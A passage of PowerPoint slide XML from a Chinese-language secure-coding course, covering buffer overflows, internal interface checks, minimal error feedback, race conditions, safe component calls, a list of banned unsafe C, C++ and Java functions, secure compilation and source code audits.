        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976880" y="4069080"/>
            <a:ext cx="5534025" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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通用编码原则-避免缓冲区溢出</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3048000" y="1792605"/>
            <a:ext cx="6096000" cy="383095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溢出后果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者可以使远程服务程序或者本地程序崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者可以设计溢出后执行的代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C/C++语言</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言特性决定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量的库函数存在溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他语言</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>调用C语言库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C#允许设置“不安全”例程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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通用编码原则-程序内部安全</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371600" y="1903095"/>
            <a:ext cx="9171940" cy="258445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程序内部接口安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序内部接口数据的检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序内部接口安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测异常，安全处理各种可能运行路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测到某些错误行为/数据，必须以合适的方式处理，保证程序运行安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>必要时立即拒绝服务，甚至不回送详细的错误代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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通用编码原则-程序内部安全</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371600" y="1493520"/>
            <a:ext cx="9171940" cy="466153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最小化反馈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>避免给予不可靠用户过多的信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功或失败</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为跟踪检查的日志可以记录较为详细的信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>认证程序在认证前尽量少给信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果程序接受了密码，不要返回它</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>避免竞争条件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问共享资源时（文件/变量）没有被适当地控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用原子操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用锁操作——避免死锁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全使用临时文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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通用编码原则-安全调用组件</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33985" y="1358900"/>
            <a:ext cx="7339330" cy="216852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应用程序实际上几乎都不会是自包含的，它们通常都会调用其他组件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>底层的操作系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可重用的库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络服务（WEB、DNS）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181610" y="3527425"/>
            <a:ext cx="7339330" cy="299974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使用安全组件，并且只采用安全的方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检查组件文档，搜索相关说明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>gets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随机数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用经过认可的组件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尽可能不调用外部命令，如果不得已要调用，必须严格检查参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>system、open、exec、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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通用编码原则-安全调用组件</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266700" y="1224280"/>
            <a:ext cx="10297160" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正确处理返回值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一定要检查返回值，调用是否成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功时检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>返回值，是否按照期望值处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据中可能含有NUL字符、无效字符或其他可能产生问题的东西</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误时检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334010" y="4063365"/>
            <a:ext cx="10756900" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保护应用程序和组件之间传递的数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>视安全需求和安全环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>考虑传输加密，包括密码算法和安全协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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通用编码原则-禁用不安全函数</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64160" y="1275715"/>
            <a:ext cx="10699115" cy="4865370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码中禁止使用的危险函数举例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言：gets()、strcpy()、strcat()、sprintf()、scanf()、system()、strtok()。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言：std::strcpy() 和 std::strcat()、std::sprintf()、std::getline()、std::vector::reserve() 和 std::vector::resize()、std::auto_ptr。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言：Runtime.exec() 和 ProcessBuilder、ObjectInputStream.readObject()，System.exit()。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件安全编译</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720340" y="3768090"/>
            <a:ext cx="6096000" cy="1886585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确保运行环境的安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将软件运行环境基于较新版本的系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2720340" y="1669415"/>
            <a:ext cx="6096000" cy="1886585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确保编译环境的安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用最新版本编译器与支持工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可靠的编译工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用编译器内置防御特性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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源代码审核</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870075"/>
            <a:ext cx="10206355" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是源代码审核</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过分析或检查源程序的语法、结构、过程、接口等来检查程序的正确性，报告源代码中可能隐藏的错误和缺陷</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码审核方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>人工审核（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>费时费力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、容易遗漏）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工具审核</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>速度快，自动</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可升级知识库</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192645" y="3221990"/>
            <a:ext cx="4171950" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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软件生命周期模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
